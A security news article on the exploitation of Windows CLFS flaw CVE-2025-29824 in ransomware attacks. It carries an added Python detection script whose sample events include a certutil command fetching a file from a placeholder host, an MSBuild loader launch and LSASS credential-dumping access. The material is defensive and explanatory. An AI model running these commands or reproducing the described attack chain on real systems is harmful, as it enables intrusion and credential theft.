
Microsoft Uncovers Zero-Day Flaw: Ransomware Exploits Target Major Sectors

4/10/2025
A newly patched Windows vulnerability has been exploited in targeted ransomware attacks against IT and financial sectors. Discover how the threat actors operated and what it means for users.

Microsoft Addresses Security Flaw in Windows CLFS Exploited in Ransomware Attacks

Microsoft has announced that a recently patched security vulnerability in the Windows Common Log File System (CLFS) was actively exploited as a zero-day in ransomware attacks against a small number of organizations. The targets include entities in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia.

Details of the Vulnerability: CVE-2025-29824

The vulnerability, tracked as CVE-2025-29824, is a privilege escalation bug in CLFS that can be exploited to obtain SYSTEM privileges. Microsoft fixed it in its April 2025 Patch Tuesday update. The company tracks the exploitation activity related to CVE-2025-29824 under the name Storm-2460. The threat actors involved have also used malware known as PipeMagic to deliver the exploit together with ransomware payloads.

Attack Vector and Malware Delivery

While the precise initial access vector used in these attacks remains unknown, the threat actors have been observed using the certutil utility to download malware from a compromised but otherwise legitimate third-party site. The download is a malicious MSBuild file containing an encrypted payload, which is then unpacked to deploy PipeMagic, a plugin-based trojan that has been circulating in the wild since 2022.

Notably, CVE-2025-29824 marks the second Windows zero-day flaw delivered via PipeMagic, following CVE-2025-24983, a privilege escalation vulnerability in the Windows Win32 Kernel Subsystem. This was flagged by ESET and patched by Microsoft just last month. Moreover, PipeMagic was previously linked to Nokoyawa ransomware attacks that exploited another CLFS zero-day vulnerability, CVE-2023-28252.

Previous Exploitation Methods

In earlier attacks attributed to the same group, victims' machines were compromised by the custom modular backdoor PipeMagic, launched through an MSBuild script, before the CLFS elevation-of-privilege vulnerability was exploited, as Kaspersky reported in April 2023.

Impact on Windows 11 and Exploit Mechanics

Notably, Windows 11, version 24H2 is not affected by this vulnerability, because access to certain System Information Classes within NtQuerySystemInformation is restricted to users holding SeDebugPrivilege, which is typically reserved for administrative users. The exploit targets a flaw in the CLFS kernel driver, which the Microsoft Threat Intelligence team described in detail.

The exploit uses a memory corruption technique together with the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF. This grants all privileges to the process, allowing it to inject into SYSTEM processes. After successful exploitation, the threat actors extract user credentials by dumping the memory of LSASS and encrypt files on the system, appending a random extension.
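The delivery chain (certutil download, MSBuild-launched loader) and the post-exploitation behaviour described above (LSASS memory dumping, mass encryption with random file extensions) each leave telemetry a defender can match on. The following is an added example, not code from the article or from Microsoft, that runs four such heuristics over constructed Sysmon-style event records; the event field names, file paths, host name and the allow-list of security agents are assumptions for illustration, and no real indicator from the campaign is used.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events (not real telemetry). Event IDs follow the
# Sysmon scheme: 1 = process creation, 10 = process access, 11 = file create.
SAMPLE_EVENTS = [
    # Benign certutil use: hashing a file, no URL on the command line.
    {"id": 1, "ts": 10, "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "certutil -hashfile C:\\Tools\\installer.msi SHA256"},
    # Delivery: certutil fetches a file from a web site (placeholder host).
    {"id": 1, "ts": 100, "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "certutil -urlcache -split -f http://compromised-site.example/l.txt C:\\Users\\Public\\l.txt"},
    # Delivery: MSBuild executes a project file from a user-writable path.
    {"id": 1, "ts": 105,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "MSBuild.exe C:\\Users\\Public\\build.proj"},
    # Post-exploitation: an unknown process opens LSASS with read access.
    {"id": 10, "ts": 200, "source": r"C:\Users\Public\svc.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1FFFFF"},
    # Benign LSASS access by an allow-listed security agent (assumed name).
    {"id": 10, "ts": 201, "source": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1010"},
] + [
    # Encryption: many files written with unfamiliar, random-looking extensions.
    {"id": 11, "ts": 300 + i, "image": r"C:\Users\Public\svc.exe",
     "file": rf"C:\Users\alice\Documents\doc{i}.docx.{ext}"}
    for i, ext in enumerate(["k3x9qz", "p7v2mt", "b8r4wn", "z1y6hc", "q5n3ld", "t9f8ej"])
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(Users\\Public|Temp|AppData)\\", re.IGNORECASE)
KNOWN_EXT = {"docx", "xlsx", "pdf", "txt", "jpg", "png", "exe", "dll", "proj", "log"}
RANDOM_EXT_RE = re.compile(r"^[a-z0-9]{5,8}$")
PROCESS_VM_READ = 0x0010          # access right needed to read LSASS memory
LSASS_ALLOWLIST = {"msmpeng.exe"}  # assumed allow-listed security agent


def basename(path):
    """Last path component, lower-cased, for case-insensitive comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def certutil_download(ev):
    """LOLBin download: certutil started with a URL on its command line."""
    return ev["id"] == 1 and basename(ev["image"]) == "certutil.exe" \
        and bool(URL_RE.search(ev["cmd"]))


def msbuild_from_user_path(ev):
    """MSBuild launched against a project file in a user-writable location."""
    return ev["id"] == 1 and basename(ev["image"]) == "msbuild.exe" \
        and bool(USER_WRITABLE_RE.search(ev["cmd"]))


def suspicious_lsass_access(ev):
    """A non-allow-listed process opens lsass.exe with PROCESS_VM_READ."""
    if ev["id"] != 10 or basename(ev["target"]) != "lsass.exe":
        return False
    if basename(ev["source"]) in LSASS_ALLOWLIST:
        return False
    return (int(ev["access"], 16) & PROCESS_VM_READ) != 0


def mass_random_extension_writes(events, window=60, threshold=5):
    """Return {image: count} for processes that create at least `threshold`
    files with unfamiliar random-looking extensions within `window` seconds."""
    per_proc = defaultdict(list)
    for ev in events:
        if ev["id"] != 11:
            continue
        ext = basename(ev["file"]).rsplit(".", 1)[-1]
        if ext not in KNOWN_EXT and RANDOM_EXT_RE.match(ext):
            per_proc[ev["image"]].append(ev["ts"])
    flagged = {}
    for image, times in per_proc.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):          # sliding window over timestamps
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[image] = best
    return flagged


def run_detections(events):
    """Apply every heuristic; returns a sorted list of (ts, rule, detail)."""
    alerts = []
    for ev in events:
        if certutil_download(ev):
            alerts.append((ev["ts"], "certutil_download", ev["cmd"]))
        elif msbuild_from_user_path(ev):
            alerts.append((ev["ts"], "msbuild_user_path", ev["cmd"]))
        elif suspicious_lsass_access(ev):
            alerts.append((ev["ts"], "lsass_access", ev["source"]))
    for image, n in mass_random_extension_writes(events).items():
        alerts.append((0, "mass_random_extension", f"{image}: {n} files"))
    return sorted(alerts)


if __name__ == "__main__":
    for ts, rule, detail in run_detections(SAMPLE_EVENTS):
        print(f"[{ts:>4}] {rule}: {detail}")
```

The heuristics are deliberately coarse: the certutil rule keys on any URL rather than a specific host, the LSASS rule keys on the read right rather than a full access mask, and the encryption rule looks for a burst of unfamiliar extensions from one process rather than a known extension. Tune the allow-list and thresholds to your environment before relying on them.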

Ransomware and Threat Actor Tactics

Although Microsoft could not obtain a sample of the ransomware for analysis, the company reported that the ransom note left after file encryption included a TOR domain linked to the RansomEXX ransomware family. Ransomware threat actors prioritize post-compromise elevation-of-privilege exploits because they turn initial access, often a handoff from a commodity malware distributor, into privileged access. That privileged access is then used to deploy and execute ransomware widely within the target environment.

© Copyright 2025 BreakingOn. All rights reserved.